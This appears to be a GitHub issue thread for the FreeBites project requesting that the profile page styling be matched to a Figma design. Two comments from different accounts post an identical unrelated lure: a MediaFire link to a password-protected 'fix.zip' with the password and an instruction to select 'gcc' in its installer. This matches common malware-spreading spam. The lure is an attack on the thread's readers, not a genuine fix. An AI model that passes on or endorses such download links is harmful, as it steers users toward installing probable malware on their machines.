### ISSUE TITLE
Profile Page Styling

### ISSUE THREAD

**Issue by sristii** [freebites/product#74]
## 📝 Task Description 

Quick ticket -- match the profile front-end to the Figma.

<img width="234" alt="Screenshot 2024-08-25 at 11 56 06 PM" src="https://github.com/user-attachments/assets/ac92f7d9-175c-41dd-9f6c-48b622a2e2fe">
--> current    

<img width="234" alt="Screenshot 2024-08-25 at 11 56 06 PM" src="https://github.com/user-attachments/assets/01d0ad78-9cd5-4448-9180-0a172e3b103e">
-->  Figma

View the [Figma](https://www.figma.com/design/pxgrEsnOJneqsaWWeEnQoY/FreeBites?node-id=5934-8368&t=fl9QYpo0e8MjRRaO-4). 

## ✅ Acceptance Criteria 

- [ ] Does the admin frontend match the Figma?

## ✨ Resources ✨
- [How to CSS](https://developer.mozilla.org/en-US/docs/Learn/Getting_started_with_the_web/CSS_basics)
- [Clarence's Styling Presentation](https://docs.google.com/presentation/d/10k0kGCUdR3twBIv9yDJ0hOQZCDFyoy99SGMMBguShFg/edit#slide=id.g24e07eed7b0_1_75)

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
